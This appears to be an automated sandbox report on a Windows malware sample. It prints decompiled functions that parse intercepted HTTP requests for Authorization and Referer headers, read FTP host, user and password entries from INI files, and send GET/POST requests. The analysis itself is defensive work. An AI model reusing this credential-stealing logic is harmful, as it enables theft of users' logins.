0x0042113c
0x00421140
0x00421144
0x00421148
0x00421150
0x00421150
0x00421163
0x00421167
0x0042116c
0x0042116e
0x00421172
0x00421175
0x0042119b
0x0042119f
0x004211a6
0x004211a6
0x004211cd
0x004211cd
0x004211d2
0x004211d3
0x004211e1
0x004211f3
0x00421201
0x00421222
0x0042122a
0x00421245
0x00421247
0x00421250
0x00421269
0x0042127a
0x0042127a
0x0042127f
0x0042127f
0x004211e1
0x00421284
0x00421288
0x004212d3
0x00000000
0x004212de
0x00000000
0x0042128a
0x0042128a
0x0042128e
0x004212ee
0x004212ee
0x00421290
0x00421294
0x004212a2
0x004212b1
0x004212b1
0x004212d0
0x004212d0
0x0042128e

APIs

Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000000,00000000,00000008,?,00000000), ref: 004210AF

Part of subcall function 00420D80: HeapAlloc.KERNEL32(?,00000008,00020002,?,?,74B04770), ref: 00420D9D
Part of subcall function 00420D80: GetPrivateProfileStringW.KERNEL32 ref: 00420DC1
Part of subcall function 00420D80: HeapAlloc.KERNEL32(?,00000008,00000C0C,?,?,74B04770), ref: 00420DFF
Part of subcall function 00420D80: StrStrIW.SHLWAPI(00000000,?,?,?,74B04770), ref: 00420E6C
Part of subcall function 00420D80: StrStrIW.SHLWAPI(-00000002,?,?,?,74B04770), ref: 00420E7C
Part of subcall function 00420D80: GetPrivateProfileStringW.KERNEL32 ref: 00420E94
Part of subcall function 00420D80: GetPrivateProfileStringW.KERNEL32 ref: 00420EB7

PathRemoveFileSpecW.SHLWAPI(?,?,?,?,00000000), ref: 004210CB
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00421163
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000024,00000104), ref: 00421245
HeapFree.KERNEL32(?,00000000,?,?,?,00000104,00000000,00000000), ref: 004212C0
HeapFree.KERNEL32(?,00000000,?,?,?,00000104,00000000,00000000), ref: 004212DE

Strings

#, xrefs: 00421134
$, xrefs: 0042111C
&, xrefs: 0042112C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$PrivateProfileString$AllocEnvironmentExpandFreePathStrings$CloseFileFolderOpenQueryRemoveSpecValue
String ID: #$$$&
API String ID: 743069011-1941049543
Opcode ID: 591d727fd1ab4c15de1e2a95feddfff9c4d3295e6a2162fb59cd896887fd13be
Instruction ID: 0c6f8feb1dbcdba425f965105de872fdeaf14a7492968b8942b9b526d7a92bba
Opcode Fuzzy Hash: 591d727fd1ab4c15de1e2a95feddfff9c4d3295e6a2162fb59cd896887fd13be
Instruction Fuzzy Hash: A661D2317043509BE724DB51EC45BEB77E4EBD4704F80091EFA44A72D0DBB8A949CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004130B0, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 69
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004130B0(signed int __ecx, void* _a4, char* _a8) {
				long _v16;
				void* _v20;
				void _v44;
				long _v48;
				intOrPtr _v64;
				long _t14;
				char* _t18;
				signed char _t24;
				char* _t25;
				long _t27;
				signed int _t32;
				void* _t33;

				_t24 = __ecx;
				_t32 = __ecx & 0x00000002;
				_t14 = 0x8404f700;
				if(_t32 != 0) {
					_t14 = 0x8444f700;
				}
				if((_t24 & 0x00000004) != 0) {
					_t14 = _t14 | 0x00800000;
				}
				_t25 = "POST";
				if((_t24 & 0x00000001) == 0) {
					_t25 = "GET";
				}
				_t33 = HttpOpenRequestA(_a4, _t25, _a8, "HTTP/1.1", 0, "�2@", _t14, 0);
				if(_t33 == 0) {
					L15:
					return 0;
				} else {
					if(_t32 == 0) {
						_t18 = "Connection: close\r\n";
						_t27 = 0x13;
					} else {
						_t18 = 0;
						_t27 = 0;
					}
					if(HttpSendRequestA(_t33, _t18, _t27, _v20, _v16) == 0) {
						L14:
						InternetCloseHandle(_t33);
						goto L15;
					} else {
						_v44 = 0;
						_v48 = 4;
						if(HttpQueryInfoA(_t33, 0x20000013,  &_v44,  &_v48, 0) == 0 || _v64 != 0xc8) {
							goto L14;
						} else {
							return _t33;
						}
					}
				}
			}

0x004130b0
0x004130b4
0x004130b7
0x004130bc
0x004130be
0x004130be
0x004130c6
0x004130c8
0x004130c8
0x004130d0
0x004130d5
0x004130d7
0x004130d7
0x004130fc
0x00413100
0x00413172
0x00413175
0x00413102
0x00413104
0x0041310c
0x00413111
0x00413106
0x00413106
0x00413108
0x00413108
0x0041312b
0x0041316a
0x0041316b
0x00000000
0x0041312d
0x0041313f
0x00413147
0x00413157
0x00000000
0x00413164
0x00413167
0x00413167
0x00413157
0x0041312b

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,2@,8404F700,00000000), ref: 004130F6
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00413123
HttpQueryInfoA.WININET(00000000,20000013,?,00000000,00000000), ref: 0041314F
InternetCloseHandle.WININET(00000000), ref: 0041316B

Strings

2@, xrefs: 004130E3
Connection: close, xrefs: 0041310C, 00413121
POST, xrefs: 004130D0
HTTP/1.1, xrefs: 004130EA
GET, xrefs: 004130D7, 004130F0

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST$2@
API String ID: 3080274660-1133444706
Opcode ID: 266f5adb9e242c4b9f494675b2f83ed68e544811eaa5d67763d17b2bcf182756
Instruction ID: 6797f585fb37d3056b566bfe1870134109758c198d95b427b5be863bbfd09e55
Opcode Fuzzy Hash: 266f5adb9e242c4b9f494675b2f83ed68e544811eaa5d67763d17b2bcf182756
Instruction Fuzzy Hash: CD11D6B23052016BE320CE588C04FE766D8ABD4716F00452EF641E72A1D7BCDE8187AD

Uniqueness

Uniqueness Score: -1.00%

Function 004079C0, Relevance: 15.5, APIs: 2, Strings: 8, Instructions: 464
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004079C0() {
				void* __edi;
				void* __esi;
				signed int _t123;
				char _t130;
				char* _t133;
				char* _t138;
				void* _t143;
				void* _t144;
				void* _t146;
				char* _t147;
				void* _t149;
				void* _t162;
				char _t170;
				signed int _t171;
				char** _t172;
				void* _t174;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				void* _t179;
				signed char _t195;
				char* _t196;
				void* _t197;
				void* _t201;
				void* _t202;
				signed int _t203;
				char* _t204;
				signed int _t205;
				signed char _t218;
				void* _t222;
				void* _t223;
				signed int _t225;
				char* _t226;
				signed int _t228;
				signed int _t229;
				char* _t232;
				intOrPtr* _t234;
				void* _t236;
				void* _t237;
				char* _t238;
				void* _t242;
				char* _t244;
				char* _t245;
				char* _t247;
				intOrPtr _t248;
				void* _t249;

				_t203 =  *(_t249 + 0x44);
				_t123 = E00410870( *((intOrPtr*)(_t249 + 0x3c)),  *((intOrPtr*)(_t249 + 0x3c)), 0, 0x48);
				_t244 = _t203 +  *((intOrPtr*)(_t249 + 0x58));
				_t171 = _t203;
				 *(_t249 + 0x28) = _t244;
				if(_t203 < _t244) {
					goto L3;
					while(1) {
						L4:
						_t202 =  *_t123;
						if(_t202 == 0xa || _t202 == 0xd) {
							goto L7;
						}
						_t123 =  &(1[_t123]);
						if(_t123 < _t244) {
							continue;
						}
						goto L7;
					}
					L7:
					_t176 =  &(1[_t123]);
					_t222 = _t123 - _t171;
					if(_t176 < _t244 &&  *_t123 == 0xd &&  *_t176 == 0xa) {
						_t123 = _t176;
					}
					_t171 =  &(1[_t123]);
					if(_t222 == 0) {
						goto L1;
					} else {
						if(_t232 == _t203) {
							_t223 = _t222 + _t232;
							_t177 = 0;
							if(_t232 >= _t223) {
								goto L1;
							} else {
								do {
									_t123 =  *_t232;
									if(_t123 == 0x20 || _t123 >= 9 && _t123 <= 0xd) {
										if(_t177 < 2) {
											 *(_t249 + 0x34 + _t177 * 4) = _t232;
										}
										_t177 =  &(1[_t177]);
									}
									_t232 =  &(_t232[1]);
								} while (_t232 < _t223);
								if(_t177 != 2) {
									goto L1;
								} else {
									_t234 =  *((intOrPtr*)(_t249 + 0x38)) + 1;
									goto L33;
								}
							}
						} else {
							if(_t222 == 0) {
								L16:
								if(_t171 < _t244) {
									_t203 =  *(_t249 + 0x54);
									L3:
									_t232 = _t171;
									_t123 = _t171;
									if(_t171 < _t244) {
										goto L4;
									}
									goto L7;
								} else {
									return _t123 | 0xffffffff;
								}
							} else {
								_t123 = StrCmpNIA(2, _t232, 0);
								if(_t123 != 0 ||  *_t232 != 0x3a) {
									goto L16;
								} else {
									_t223 = _t222 + _t232;
									do {
										_t170 = _t232[1];
										_t232 =  &(_t232[1]);
									} while (_t170 == 0x20 || _t170 >= 9 && _t170 <= 0xd);
									_t203 =  *(_t249 + 0x54);
									L33:
									_t123 = _t223 - _t234;
									if(_t234 == 0) {
										goto L1;
									} else {
										if(_t123 == 0xffffffff) {
											_t123 = 0;
											if( *_t234 != 0) {
												do {
													_t123 =  &(1[_t123]);
												} while ( *((char*)(_t123 + _t234)) != 0);
											}
										}
										if(_t123 != 8) {
											_t123 = _t123 - 8;
											if(_t123 == 0) {
												goto L44;
											} else {
												goto L43;
											}
										} else {
											_t201 = 0;
											while(1) {
												_t17 = _t201 + "HTTP/1.1"; // 0x50545448
												_t123 =  *((char*)(_t201 + _t234)) -  *_t17;
												if(_t123 != 0) {
													break;
												}
												_t201 = _t201 + 1;
												if(_t201 < 8) {
													continue;
												} else {
													L44:
													_t225 = _t203;
													if(_t203 >= _t244) {
														goto L1;
													} else {
														_t204 = _t244;
														do {
															_t245 = _t225;
															_t123 = _t225;
															if(_t225 < _t204) {
																while(1) {
																	_t197 =  *_t123;
																	if(_t197 == 0xa || _t197 == 0xd) {
																		goto L50;
																	}
																	_t123 =  &(1[_t123]);
																	if(_t123 < _t204) {
																		continue;
																	}
																	goto L50;
																}
															}
															L50:
															_t178 =  &(1[_t123]);
															_t236 = _t123 - _t225;
															if(_t178 < _t204 &&  *_t123 == 0xd &&  *_t178 == 0xa) {
																_t123 = _t178;
															}
															_t225 =  &(1[_t123]);
															if(_t236 == 0) {
																goto L1;
															} else {
																if(_t245 ==  *(_t249 + 0x54)) {
																	_t237 = _t236 + _t245;
																	_t205 = 0;
																	_t123 = _t245;
																	if(_t245 >= _t237) {
																		goto L1;
																	} else {
																		do {
																			_t179 =  *_t123;
																			if(_t179 == 0x20 || _t179 >= 9 && _t179 <= 0xd) {
																				if(_t205 < 2) {
																					 *(_t249 + 0x34 + _t205 * 4) = _t123;
																				}
																				_t205 =  &(1[_t205]);
																			}
																			_t123 =  &(1[_t123]);
																		} while (_t123 < _t237);
																		if(_t205 != 2) {
																			goto L1;
																		} else {
																			_t247 =  &(1[ *(_t249 + 0x34)]);
																			_t123 =  *((intOrPtr*)(_t249 + 0x38)) - _t247;
																			 *(_t249 + 0x18) = _t123;
																			goto L77;
																		}
																	}
																} else {
																	if(_t236 == 0) {
																		goto L59;
																	} else {
																		_t123 = StrCmpNIA(1, _t245, 0);
																		if(_t123 != 0 ||  *_t245 != 0x3a) {
																			goto L59;
																		} else {
																			_t242 = _t236 + _t245;
																			do {
																				_t123 = _t245[1];
																				_t245 =  &(_t245[1]);
																			} while (_t123 == 0x20 || _t123 >= 9 && _t123 <= 0xd);
																			 *(_t249 + 0x18) = _t242 - _t245;
																			L77:
																			if(_t247 == 0 ||  *(_t249 + 0x18) == 0) {
																				goto L1;
																			} else {
																				_push(_t249 + 0x24);
																				_push(0);
																				_push( *((intOrPtr*)(_t249 + 0x58)));
																				_push( *(_t249 + 0x54));
																				_t123 = E00417950();
																				 *(_t249 + 0x30) = _t123;
																				if(_t123 == 0 ||  *((intOrPtr*)(_t249 + 0x24)) == 0) {
																					goto L1;
																				} else {
																					_push(_t249 + 0x20);
																					_push("Host");
																					_push( *((intOrPtr*)(_t249 + 0x58)));
																					_push( *(_t249 + 0x54));
																					_t123 = E00417950();
																					 *(_t249 + 0x2c) = _t123;
																					if(_t123 == 0 ||  *((intOrPtr*)(_t249 + 0x20)) == 0) {
																						goto L1;
																					} else {
																						_push(_t249 + 0x28);
																						_push(3);
																						_push( *((intOrPtr*)(_t249 + 0x58)));
																						_push( *(_t249 + 0x54));
																						_t123 = E00417950();
																						 *(_t249 + 0x34) = _t123;
																						if(_t123 == 0) {
																							goto L1;
																						} else {
																							_push(_t249 + 0x14);
																							_push("Content-Length");
																							_push( *((intOrPtr*)(_t249 + 0x58)));
																							_push( *(_t249 + 0x54));
																							 *(_t249 + 0x2c) = 0;
																							_t123 = E00417950();
																							_t184 = _t123;
																							if(_t123 == 0) {
																								if( *(_t249 + 0x28) != 0) {
																									goto L1;
																								} else {
																									goto L91;
																								}
																							} else {
																								_t123 =  *(_t249 + 0x14);
																								if(_t123 == 0 || _t123 > 0xa) {
																									goto L1;
																								} else {
																									E00410DE0(_t123, _t184, _t249 + 0x3c);
																									_t123 = E004110A0(_t249 + 0x3c, _t249 + 0x13);
																									if( *((char*)(_t249 + 0x13)) != 0) {
																										goto L1;
																									} else {
																										_t196 =  *(_t249 + 0x28);
																										if(_t123 < _t196) {
																											goto L1;
																										} else {
																											 *((intOrPtr*)(_t249 + 0x1c)) = _t123 - _t196;
																											L91:
																											_t130 = ( *(_t249 + 0x50))[0x14];
																											_t172 =  *(_t249 + 0x4c);
																											 *_t172 = 2;
																											_t226 = "http://";
																											_t238 = 7;
																											if(_t130 > 0) {
																												_t226 =  *0x42d3b0(_t130);
																												_t249 = _t249 + 4;
																												if(_t226 != 0) {
																													_t162 = 0;
																													_t174 = _t226 - "NSS layer";
																													while(1) {
																														_t64 = _t174 + "NSS layer"; // 0x2053534e
																														_t195 =  *((intOrPtr*)(_t162 + _t64));
																														_t65 = _t162 + "NSS layer"; // 0x2053534e
																														_t218 =  *_t65;
																														if(_t195 != _t218) {
																															break;
																														}
																														_t162 = _t162 + 1;
																														if(_t162 < 9) {
																															continue;
																														} else {
																															L98:
																															_t226 = "https://";
																															_t238 = 8;
																														}
																														L99:
																														_t172 =  *(_t249 + 0x4c);
																														goto L100;
																													}
																													if((_t195 & 0x000000ff) == (_t218 & 0x000000ff)) {
																														goto L98;
																													}
																													goto L99;
																												}
																											}
																											L100:
																											_t70 =  *(_t249 + 0x18) + 9; // 0x9
																											_t133 = E004107A0( *((intOrPtr*)(_t249 + 0x20)) + _t70);
																											_t172[2] = _t133;
																											if(_t133 != 0) {
																												E00410820(_t133, _t226, _t238);
																												_t172[3] = _t238;
																												_t172[3] =  &(_t172[3][E00410820( &(_t172[2][_t238]),  *(_t249 + 0x2c),  *((intOrPtr*)(_t249 + 0x20)))]);
																												_t138 = _t172[3];
																												if( *_t247 != 0x2f) {
																													_t138[_t172[2]] = 0x2f;
																													_t172[3] =  &(_t138[1]);
																												}
																												_t172[3] =  &(_t172[3][E00410820( &(_t172[3][_t172[2]]), _t247,  *(_t249 + 0x18))]);
																												_t248 =  *((intOrPtr*)(_t249 + 0x58));
																												_t172[3][_t172[2]] = 0;
																												_push(_t249 + 0x14);
																												_push("Referer");
																												_push(_t248);
																												_push( *(_t249 + 0x54));
																												_t143 = E00417950();
																												_t239 = _t143;
																												if(_t143 != 0) {
																													_t229 =  *(_t249 + 0x14);
																													if(_t229 != 0) {
																														_t172[4] = E00410E10(_t229, _t239);
																														_t172[5] = _t229;
																													}
																												}
																												_t144 =  *( *(_t249 + 0x30));
																												if(_t144 != 0x50 ||  *((intOrPtr*)(_t249 + 0x24)) != 4) {
																													if(_t144 == 0x47 &&  *((intOrPtr*)(_t249 + 0x24)) == 3) {
																														_t172[6] = 0;
																														goto L112;
																													}
																												} else {
																													_t172[6] = 1;
																													L112:
																													_push(_t249 + 0x14);
																													_push("Content-Type");
																													_push(_t248);
																													_push( *(_t249 + 0x54));
																													_t146 = E00417950();
																													_t240 = _t146;
																													if(_t146 != 0) {
																														_t228 =  *(_t249 + 0x14);
																														if(_t228 != 0) {
																															_t172[7] = E00410E10(_t228, _t240);
																															_t172[8] = _t228;
																														}
																													}
																													_t147 =  *(_t249 + 0x28);
																													_t107 = _t147 - 1; // -1
																													if(_t107 <= 0xfffff) {
																														_t172[9] =  *(_t249 + 0x34);
																														_t172[0xa] = _t147;
																													}
																													_push(_t249 + 0x14);
																													_push("Authorization");
																													_push(_t248);
																													_push( *(_t249 + 0x54));
																													_t149 = E00417950();
																													_t241 = _t149;
																													if(_t149 != 0) {
																														_t227 =  *(_t249 + 0x14);
																														if( *(_t249 + 0x14) != 0 && E00417ED0(_t149,  &(_t172[0xb]),  &(_t172[0xc])) == 0) {
																															_t172[0xd] = E00410E10(_t227, _t241);
																														}
																													}
																													_t172[0x10] = E00423A90();
																													_t172[0x11] = E0040C250();
																													_t172[1] =  *(_t249 + 0x50);
																												}
																											}
																											return  *((intOrPtr*)(_t249 + 0x1c));
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
															goto L123;
															L59:
															_t204 =  *(_t249 + 0x28);
														} while (_t225 < _t204);
														return _t123 | 0xffffffff;
													}
												}
												goto L123;
											}
											L43:
											_t123 = (0 | _t123 > 0x00000000) + (0 | _t123 > 0x00000000) - 1;
											if(_t123 != 0) {
												goto L1;
											} else {
												goto L44;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return _t123 | 0xffffffff;
				}
				L123:
			}

0x004079c7
0x004079d4
0x004079dd
0x004079e0
0x004079e2
0x004079e8
0x00000000
0x00407a03
0x00407a03
0x00407a03
0x00407a08
0x00000000
0x00000000
0x00407a0f
0x00407a12
0x00000000
0x00000000
0x00000000
0x00407a12
0x00407a14
0x00407a16
0x00407a19
0x00407a1d
0x00407a29
0x00407a29
0x00407a2b
0x00407a30
0x00000000
0x00407a32
0x00407a34
0x00407a5f
0x00407a61
0x00407a65
0x00000000
0x00407a67
0x00407a67
0x00407a67
0x00407a6b
0x00407a78
0x00407a7a
0x00407a7a
0x00407a7e
0x00407a7e
0x00407a7f
0x00407a80
0x00407a87
0x00000000
0x00407a8d
0x00407a91
0x00000000
0x00407a91
0x00407a87
0x00407a36
0x00407a38
0x00407a4e
0x00407a50
0x004079f7
0x004079fb
0x004079fb
0x004079fd
0x00407a01
0x00000000
0x00000000
0x00000000
0x00407a55
0x00407a5c
0x00407a5c
0x00407a3a
0x00407a3f
0x00407a47
0x00000000
0x00407a94
0x00407a94
0x00407a96
0x00407a96
0x00407a99
0x00407a9a
0x00407aa6
0x00407aaa
0x00407aac
0x00407ab0
0x00000000
0x00407ab6
0x00407ab9
0x00407abb
0x00407abf
0x00407ac1
0x00407ac1
0x00407ac2
0x00407ac1
0x00407abf
0x00407acb
0x00407ae7
0x00407aea
0x00000000
0x00000000
0x00000000
0x00000000
0x00407acd
0x00407acd
0x00407ad0
0x00407ad4
0x00407adb
0x00407add
0x00000000
0x00000000
0x00407adf
0x00407ae3
0x00000000
0x00407ae5
0x00407b01
0x00407b01
0x00407b05
0x00000000
0x00407b0b
0x00407b0b
0x00407b10
0x00407b10
0x00407b12
0x00407b16
0x00407b18
0x00407b18
0x00407b1d
0x00000000
0x00000000
0x00407b24
0x00407b27
0x00000000
0x00000000
0x00000000
0x00407b27
0x00407b18
0x00407b29
0x00407b2b
0x00407b2e
0x00407b32
0x00407b3e
0x00407b3e
0x00407b40
0x00407b45
0x00000000
0x00407b4b
0x00407b4f
0x00407b7f
0x00407b81
0x00407b83
0x00407b87
0x00000000
0x00407b90
0x00407b90
0x00407b90
0x00407b95
0x00407ba4
0x00407ba6
0x00407ba6
0x00407baa
0x00407baa
0x00407bab
0x00407bac
0x00407bb3
0x00000000
0x00407bb9
0x00407bc1
0x00407bc2
0x00407bc4
0x00000000
0x00407bc4
0x00407bb3
0x00407b51
0x00407b53
0x00000000
0x00407b55
0x00407b5a
0x00407b62
0x00000000
0x00407bca
0x00407bca
0x00407bcc
0x00407bcc
0x00407bcf
0x00407bd0
0x00407bde
0x00407be2
0x00407be4
0x00000000
0x00407bf5
0x00407c01
0x00407c02
0x00407c04
0x00407c05
0x00407c06
0x00407c0b
0x00407c11
0x00000000
0x00407c22
0x00407c2e
0x00407c2f
0x00407c34
0x00407c35
0x00407c36
0x00407c3b
0x00407c41
0x00000000
0x00407c52
0x00407c5e
0x00407c5f
0x00407c61
0x00407c62
0x00407c63
0x00407c68
0x00407c6e
0x00000000
0x00407c74
0x00407c80
0x00407c81
0x00407c86
0x00407c87
0x00407c88
0x00407c90
0x00407c95
0x00407c99
0x00407ce6
0x00000000
0x00000000
0x00000000
0x00000000
0x00407c9b
0x00407c9b
0x00407ca1
0x00000000
0x00407cb0
0x00407cb4
0x00407cbd
0x00407cc7
0x00000000
0x00407ccd
0x00407ccd
0x00407cd3
0x00000000
0x00407cd9
0x00407cdb
0x00407cec
0x00407cf0
0x00407cf3
0x00407cf7
0x00407cfd
0x00407d02
0x00407d09
0x00407d12
0x00407d14
0x00407d19
0x00407d1d
0x00407d1f
0x00407d30
0x00407d30
0x00407d30
0x00407d37
0x00407d37
0x00407d3f
0x00000000
0x00000000
0x00407d41
0x00407d45
0x00000000
0x00407d47
0x00407d53
0x00407d53
0x00407d58
0x00407d58
0x00407d5d
0x00407d5d
0x00000000
0x00407d5d
0x00407d51
0x00000000
0x00000000
0x00000000
0x00407d51
0x00407d19
0x00407d61
0x00407d69
0x00407d6d
0x00407d72
0x00407d77
0x00407d80
0x00407d95
0x00407d9d
0x00407da4
0x00407da7
0x00407dac
0x00407db1
0x00407db1
0x00407dc6
0x00407dcf
0x00407dd7
0x00407ddf
0x00407de0
0x00407de5
0x00407de6
0x00407de7
0x00407dec
0x00407df0
0x00407df2
0x00407df8
0x00407e01
0x00407e04
0x00407e04
0x00407df8
0x00407e0b
0x00407e0f
0x00407e20
0x00407e31
0x00000000
0x00407e31
0x00407e18
0x00407e18
0x00407e35
0x00407e3d
0x00407e3e
0x00407e43
0x00407e44
0x00407e45
0x00407e4a
0x00407e4e
0x00407e50
0x00407e56
0x00407e5f
0x00407e62
0x00407e62
0x00407e56
0x00407e65
0x00407e69
0x00407e72
0x00407e78
0x00407e7b
0x00407e7b
0x00407e86
0x00407e87
0x00407e8c
0x00407e8d
0x00407e8e
0x00407e93
0x00407e97
0x00407e99
0x00407e9f
0x00407ebb
0x00407ebb
0x00407e9f
0x00407ec3
0x00407ecb
0x00407ed2
0x00407ed2
0x00407e0f
0x00407ee0
0x00407ee0
0x00407cd3
0x00407cc7
0x00407ca1
0x00407c99
0x00407c6e
0x00407c41
0x00407c11
0x00407be4
0x00407b62
0x00407b53
0x00407b4f
0x00000000
0x00407b6a
0x00407b6a
0x00407b6e
0x00407b7c
0x00407b7c
0x00407b05
0x00000000
0x00407ae3
0x00407aec
0x00407af7
0x00407afb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407afb
0x00407acb
0x00407ab0
0x00407a47
0x00407a38
0x00407a34
0x004079ed
0x004079ed
0x004079f4
0x004079f4
0x00000000

APIs

StrCmpNIA.SHLWAPI(00000002,?,00000000,?,00000000,00000048,?,00000000,?,?), ref: 00407A3F

Strings

http://, xrefs: 00407CFD
Content-Type, xrefs: 00407E3E
Authorization, xrefs: 00407E87
Referer, xrefs: 00407DE0
NSS layer, xrefs: 00407D1F
https://, xrefs: 00407D53, 00407D7E
Content-Length, xrefs: 00407C81
Host, xrefs: 00407C2F

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Authorization$Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
API String ID: 0-1017483493
Opcode ID: 21821707a315e6482d1e7db17395ef25ba7aaa64400c530fee0aa85154258544
Instruction ID: 5d33599ef9a5f628cf7e6241bf96a333194a9143598dfe9232fac7c71acd41c8
Opcode Fuzzy Hash: 21821707a315e6482d1e7db17395ef25ba7aaa64400c530fee0aa85154258544
Instruction Fuzzy Hash: F9F1E971A0C3414BD720CE28C490B6BB7E59B85314F14897FE884AB395D679FC85CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00421310, Relevance: 15.2, APIs: 10, Instructions: 212
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00421310(WCHAR* __ecx, signed char* __edx, intOrPtr _a4) {
				short _v524;
				short _v532;
				short _v536;
				char _v576;
				short _v596;
				char _v608;
				short _v612;
				char _v620;
				short _v624;
				char _v628;
				short _v632;
				char _v636;
				short _v640;
				void* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				WCHAR* _v656;
				void* __ebx;
				void* __esi;
				WCHAR* _t44;
				long _t50;
				WCHAR* _t63;
				void* _t64;
				int _t69;
				void* _t78;
				void* _t80;
				WCHAR* _t86;
				WCHAR* _t87;
				WCHAR* _t90;
				signed int _t116;
				void* _t119;
				signed char* _t122;
				intOrPtr _t133;
				WCHAR* _t134;
				signed int _t136;
				void* _t138;

				_t90 = __ecx;
				_t138 = (_t136 & 0xfffffff8) - 0x284;
				_t122 = __edx;
				_t44 = __edx + 0x2c;
				if(_t44 != 0) {
					L1:
					_t116 =  *_t44 & 0x0000ffff;
					if(_t116 == 0x5c || _t116 == 0x2f) {
						_t44 =  &(_t44[1]);
						goto L1;
					}
				}
				if(PathCombineW( &_v524, _t90, _t44) == 0) {
					L29:
					return 1;
				} else {
					if(( *_t122 & 0x00000010) == 0) {
						_t119 = HeapAlloc( *0x42e6d4, 8, 0x20002);
						_v640 = _t119;
						if(_t119 != 0) {
							_t50 = GetPrivateProfileStringW(0, 0, 0, _t119, 0xffff,  &_v532);
							if(_t50 != 0) {
								_t12 = _t50 + 1; // 0x1
								if(E00411F50(_t119, _t12) != 0) {
									_t86 = HeapAlloc( *0x42e6d4, 8, 0xc20);
									_v648 = _t86;
									if(_t86 != 0) {
										_t14 =  &(_t86[0x2fd]); // 0x5fa
										_v652 = _t14;
										E00424100(0x72,  &_v596);
										E00424100(0x73,  &_v608);
										E00424100(0x74,  &_v620);
										E00424100(0x75,  &_v628);
										E00424100(0x76,  &_v636);
										while(1) {
											_t63 = StrStrIW(_t119,  &_v596);
											if(_t63 != 0 || GetPrivateProfileStringW(_t119,  &_v612, _t63, _t86, 0xff,  &_v536) == 0) {
												goto L22;
											}
											_t69 = GetPrivateProfileIntW(_t119,  &_v624, 0x15,  &_v536);
											_v648 = _t69;
											if(_t69 - 1 <= 0xfffe) {
												_t87 =  &(_t86[0xff]);
												if(GetPrivateProfileStringW(_t119,  &_v632, 0, _t87, 0xff,  &_v536) == 0) {
													L21:
													_t86 = _v652;
												} else {
													_t30 =  &(_t87[0xff]); // 0x1fe
													_t130 = _t30;
													if(GetPrivateProfileStringW(_t119,  &_v640, 0, _t30, 0xff,  &_v536) == 0 || E004212F0(_t130) <= 0) {
														goto L21;
													} else {
														E00424100(0x55,  &_v576);
														_push(_v648);
														_push(_v652);
														_t35 =  &(_t87[0xff]); // 0x1fe
														_push(_t35);
														_t132 = _v656;
														_push(_t87);
														_t78 = E00411D10(_t35, 0x311, _v656,  &_v576);
														_t138 = _t138 + 0x14;
														if(_t78 <= 0) {
															goto L21;
														} else {
															_t133 = _a4;
															_t80 = E00410D70(_t133, _t132, _t78);
															_t86 = _v656;
															if(_t80 != 0) {
																 *((intOrPtr*)(_t133 + 4)) =  *((intOrPtr*)(_t133 + 4)) + 1;
															}
														}
													}
												}
											}
											L22:
											_t64 = 0;
											goto L23;
											do {
												do {
													L23:
													_t119 = _t119 + 2;
												} while ( *((short*)(_t119 - 2)) != 0);
												if( *_t119 != 0) {
													goto L25;
												}
												E004107C0(_t86);
												_t119 = _v644;
												goto L28;
												L25:
												_t64 = _t64 + 1;
											} while (_t64 != 1);
										}
									}
								}
							}
							L28:
							HeapFree( *0x42e6d4, 0, _t119);
						}
						goto L29;
					} else {
						_t134 =  &_v596;
						E00424100(0x71, _t134);
						_v652 = _t134;
						E00418700( &_v532,  &_v652, 1, 5, E00421310, _a4, 0, 0, 0);
						return 1;
					}
				}
			}

0x00421310
0x00421316
0x0042131e
0x00421320
0x00421326
0x00421328
0x00421328
0x0042132e
0x00421335
0x00000000
0x00421335
0x0042132e
0x0042134c
0x004215a5
0x004215ad
0x00421352
0x00421355
0x004213ae
0x004213b0
0x004213b6
0x004213d0
0x004213d8
0x004213de
0x004213ea
0x00421400
0x00421402
0x00421408
0x0042140e
0x0042141d
0x00421421
0x0042142f
0x0042143d
0x0042144b
0x00421459
0x00421460
0x00421466
0x0042146e
0x00000000
0x00000000
